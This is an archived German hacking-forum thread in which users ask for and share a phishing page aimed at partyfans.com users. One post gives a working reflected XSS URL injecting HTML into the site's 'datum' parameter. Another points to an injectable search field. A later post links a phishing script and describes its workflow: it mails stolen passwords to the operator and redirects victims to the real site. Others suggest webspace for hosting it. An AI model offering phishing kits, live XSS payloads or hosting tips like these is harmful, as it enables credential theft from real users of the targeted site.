PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [s] Partyfans.com Phishing Seite



bauernsk1ll
14.12.2008, 19:47
Hi,
ich habe jetzt schon 2 phishing vtuts durchgearbeitet leider erfolglos.
Bei anderen Seiten klappts ganz gut, aber bei partyfans.com komm ich immer ins stocken...
Könnte mir evtl jemand phishingseite für partyfans.com machen, wenn derjenige dann noch lust hat kann er mir ja die Tücke bei dieser Seite näher bringen.

soweit von mir
mfg

s23_
14.12.2008, 21:12
Mit ein paar HTML Kenntnissen & Anfängerwissen in PHP solltest du das auch alleins hinbekommen :)
Also lieber dafür Tutorials suchen anstatt für Phishing-Seiten... ;)

Da ich selbst auf dieser Seite gereggt bin & vor ca 2 Jahren auch schonmal nach Lücken gesucht habe, kann ich dir verraten, dass es mal eine XSS Lücke in der Suchfunktion gab - Leider seit ein paar Monaten gefixxt... =/ bin mir aber sicher, dass man - wenn man sich ein bisschen umschaut sicherlich noch mehr findet, da die Seite komplett selbst Programmiert wurde... und wie wir alle wissen - keiner ist fehlerfrei :)
[mit soetwas hätte man meiner Meinung nach mehr Erfolg als mit Phishing...]

bauernsk1ll
14.12.2008, 21:57
Von so einer Lücke hab ich schon gehört, leider habe ich von sowas nur minimal Ahnung :(

Hack_Eddie
17.12.2008, 11:28
Ich bräuchtee auch eine Partyfans.com pishing Seite,
Kann einer machen pls?

Trick0r
17.12.2008, 13:49
Sind doch immer noch XSS Lücken ;) Beispielsweise im GET-Parameter datum hier:


http://www.partyfans.com/index.php?dest=3400&datum=2009-05"><h1>Wer mir Sql-i beibringen möchte ... ICQ: 482226845</h1>&Submit=anzeigen

s23_
17.12.2008, 17:56
Ich bräuchtee auch eine Partyfans.com pishing Seite,
Kann einer machen pls?


Hi,
ich habe jetzt schon 2 phishing vtuts durchgearbeitet leider erfolglos.
Bei anderen Seiten klappts ganz gut, aber bei partyfans.com komm ich immer ins stocken...
Könnte mir evtl jemand phishingseite für partyfans.com machen, wenn derjenige dann noch lust hat kann er mir ja die Tücke bei dieser Seite näher bringen.

soweit von mir
mfg

Wenn ich am WE ein bisschen Zeit finde mach ich mal eine.. ;)


@Trick0r:
Jep... ist auch nicht die Einzigste die man dort noch findet^^
Man muss alleins in der suche mal --> eingeben und bekommt schon 'ne Order by angezeigt.. :) (die man aber leider nicht injecten kann, bzw. habe mich noch nicht allzuarg damit auseinander gesetzt..)



PS. wie kommt es dass sich so viele von Partyfans hier rumtreiben und solche anfragen stellen... :shock:

bauernsk1ll
17.12.2008, 20:21
:) kA

s23_
22.12.2008, 21:40
Wie versprochen, hier mal das Phishing-Script:
http://uploaded.to/?id=a2coqi

Anmerkung:
- Euer Webspace auf den ihr es ladet muss PHP unterstützen und Mails versenden können.
- In die userLogin.php die Mailadresse eintragen, an welche das PWD geschickt werden soll.


--
Kurze Beschreibung:
1: User besucht Eure Seite & gibt Daten ein.
2: Die Daten werden an Eure Mailadresse geschickt.
3: Der User wird auf die original Partyfansseite umgeleitet und bekommt eine Nachricht, dass er das falsche Passwort eingegeben hat.

bauernsk1ll
22.12.2008, 22:44
super vielen dank!

edit: mein webspace wird andauernd gesperrt welchen empfehlt ihr? mit php+mail senden

la0
23.12.2008, 09:36
ohost.de

extra.hu

Acer_92
26.04.2009, 21:45
Könntest du´s villeicht nochmal hochladen? Wär echt toll. Der link funtzt nämlich nett ;-)

Digifree
28.04.2009, 08:07
Link ist Down bitte nen Reupp will mir das mal anschauen. Danke